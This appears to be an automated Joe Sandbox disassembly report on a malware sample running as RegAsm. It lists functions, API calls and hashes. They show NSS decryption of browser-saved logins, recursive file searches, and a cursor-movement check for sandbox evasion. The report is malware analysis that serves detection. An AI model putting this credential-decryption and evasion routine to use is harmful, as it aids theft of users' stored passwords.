API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 931292a53c89f7825d7052a70e6c6c9688c0edd5c0d2e8349b1a2af30603cbf6
Instruction ID: 3a6d8cef7a2dfccbe5ef4d35614533eb4aec28a676b070ea5d3c03cadb6b3644
Opcode Fuzzy Hash: 931292a53c89f7825d7052a70e6c6c9688c0edd5c0d2e8349b1a2af30603cbf6
Instruction Fuzzy Hash: BF514C76B016494FC708CDADDC527DAB7DA9BA4310F48C23AE841DB785D638D907C751

Function 0040A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A815
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
_memmove.LIBCMT ref: 0040A8BB
lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
lstrcatA.KERNEL32(00436803,0043680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
String ID:
API String ID: 4058207798-0
Opcode ID: e17fc33a894e7de98c8cdb2d54bb422c740a31d725e08563c771d2a5810bb879
Instruction ID: e5b103c88d9bdf2096a1c254317711793328f63bcb20c9ad0d5a8f78a1bbe6ba
Opcode Fuzzy Hash: e17fc33a894e7de98c8cdb2d54bb422c740a31d725e08563c771d2a5810bb879
Instruction Fuzzy Hash: 2B311EB2D0021AAFCB20DF55DD849FAB7BCAF08345F5440B6B40AE2281E7785A459F66

Function 0040CD37 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040CD5C
FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
StrCmpCA.SHLWAPI(?,004374E0), ref: 0040CD94
StrCmpCA.SHLWAPI(?,004374E4), ref: 0040CDAE

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

lstrlenA.KERNEL32(0040D3B5,0043687B,004374E8,?,00436873), ref: 0040CE41

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

FindNextFileA.KERNEL32(?,?), ref: 0040D23C
FindClose.KERNEL32(?), ref: 0040D250

Strings

%s\*.*, xrefs: 0040CD56

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 833390005-1013718255
Opcode ID: d04536fe8aefbfc2938d0eb5dc0257ef3385df14cf114f2b5742483623188cf0
Instruction ID: 23eec540c445f5842390c8e421120f503116f8df2713eaa621d6a72780b40eda
Opcode Fuzzy Hash: d04536fe8aefbfc2938d0eb5dc0257ef3385df14cf114f2b5742483623188cf0
Instruction Fuzzy Hash: 14D1EC72A0112D9BDF20FB25DD46ADD77B5AF44308F4100E6B908B3192DA78AFC98F95

Function 6C268D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C2B14E4,6C21CC70), ref: 6C268D47
PR_GetCurrentThread.NSS3 ref: 6C268D98

Part of subcall function 6C140F00: PR_GetPageSize.NSS3(6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F1B
Part of subcall function 6C140F00: PR_NewLogModule.NSS3(clock,6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C268E7B
htons.WSOCK32(?), ref: 6C268EDB
PR_GetCurrentThread.NSS3 ref: 6C268F99
PR_GetCurrentThread.NSS3 ref: 6C26910A

Strings

%u.%u.%u.%u, xrefs: 6C268E74

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: e2be04bfd2168cba73105906125ebda16b690160107a485e8c593a9b5378b48b
Instruction ID: 471ea329117ac3792631eec89466a00244b63f1ceb7f842bc06fd86a43ce4609
Opcode Fuzzy Hash: e2be04bfd2168cba73105906125ebda16b690160107a485e8c593a9b5378b48b
Instruction Fuzzy Hash: 8902CE3190529A8FDB14CF1EC458766BBB2EF43304F29829AEC915BE91CB31D985C7B0

Function 6C20A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C22C3A2,?,?,00000000,00000000), ref: 6C20A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C20A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C20A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C20A738

Strings

%s at line %d of [%.10s], xrefs: 6C20A6D9
database corruption, xrefs: 6C20A6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C20A6CA

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: 89d74e6b6a887734e6c17de907172fd36169163de16e3fca1660642b6f785216
Instruction ID: 5187991d4275a10fffba000a4d3c2a6b3874dc9f5c56785cf09bf16d1578744e
Opcode Fuzzy Hash: 89d74e6b6a887734e6c17de907172fd36169163de16e3fca1660642b6f785216
Instruction Fuzzy Hash: CE91A171B08309CBC714CF29C490A5AB7F1BF48714F954A6EEC958BB91EB70E885C792

Function 6C1E4540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C1E4571
memset.VCRUNTIME140(?,00000000,00000000), ref: 6C1E45B1
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C1E45C2

Part of subcall function 6C1E04C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C1E461B,-00000004), ref: 6C1E04DF
Part of subcall function 6C1E04C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C1E461B,-00000004), ref: 6C1E0534

PR_Now.NSS3 ref: 6C1E4626

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1E4634
memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C1E46C4
PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C1E46E3
PR_SetError.NSS3(?,00000000), ref: 6C1E4722

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
String ID:
API String ID: 1183590942-0
Opcode ID: 48e7a8abf8d2bd9e6e6016707bfdb77160577767155bc2dff01f025231417892
Instruction ID: edbbacbd7faa17ecbec715b8c4a642b9e25687a2282f66963e61d9f60a93cdfa
Opcode Fuzzy Hash: 48e7a8abf8d2bd9e6e6016707bfdb77160577767155bc2dff01f025231417892
Instruction Fuzzy Hash: 0C61D2B1E00A049FEB10CFA9D884B9AB7F1FF5D308F154529E8459BB91E730E949CB84

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 0040B93F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436822,?,?,?), ref: 0040B99B
StrCmpCA.SHLWAPI(?,00437430), ref: 0040B9BC
StrCmpCA.SHLWAPI(?,00437434), ref: 0040B9D6

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
FindClose.KERNEL32(?), ref: 0040BF05

Strings

\*.*, xrefs: 0040B965

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2390431556-1173974218
Opcode ID: cd4816bf80e4a0d91573987b6d65a58d1c3178420742fd31a3dbbeaf00042327
Instruction ID: 6a77d07a7cc4b04092757a256aab1ae8f304a91e9048ea44ca1240be8b647ecd
Opcode Fuzzy Hash: cd4816bf80e4a0d91573987b6d65a58d1c3178420742fd31a3dbbeaf00042327
Instruction Fuzzy Hash: 99E1BB7194012D9BCF21FB26DD4AACDB375AF54309F4100E6A508771A1DB78AFC98F98

Function 0042B02C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B695,?,00428446,?,000000BC,?), ref: 0042B06B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B695,?,00428446,?,000000BC,?), ref: 0042B094
GetACP.KERNEL32(?,?,0042B695,?,00428446,?,000000BC,?), ref: 0042B0A8

Strings

OCP, xrefs: 0042B04C
ACP, xrefs: 0042B03B

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: cc6112e6bf448f0aa4722196138512c0bef7958d9a23dcf390bac3a9b2425bec
Instruction ID: 476443fa4f1b76037d775ea235197defd9bd133b75abf9dc67574ab4153ae61c
Opcode Fuzzy Hash: cc6112e6bf448f0aa4722196138512c0bef7958d9a23dcf390bac3a9b2425bec
Instruction Fuzzy Hash: 7601D431701626BAEB229B61BC46F9B73A8DB04359F60016AF551E11C0EB68CF81929C

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: 059c3654a4b260fd85ed43b787e3705a7d8e4ad0c8abd00a810634e5d831d389
Instruction ID: 84dc8faf3d1d23f5610065c73d7d010c750f6e3510fdb6781f79ce99a2f0a289
Opcode Fuzzy Hash: 059c3654a4b260fd85ed43b787e3705a7d8e4ad0c8abd00a810634e5d831d389
Instruction Fuzzy Hash: 14F03770101334BBCB319F22DC8CE8B7FA9EF0ABA1F000055FA49A6290D7B14940DAA1

Function 6C164420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C164444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C164466

Part of subcall function 6C1B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B1228
Part of subcall function 6C1B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C1B1238
Part of subcall function 6C1B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B124B
Part of subcall function 6C1B1200: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B125D
Part of subcall function 6C1B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C1B126F
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C1B1280
Part of subcall function 6C1B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C1B128E
Part of subcall function 6C1B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C1B129A
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C1B12A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C16447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C16448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C164494

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
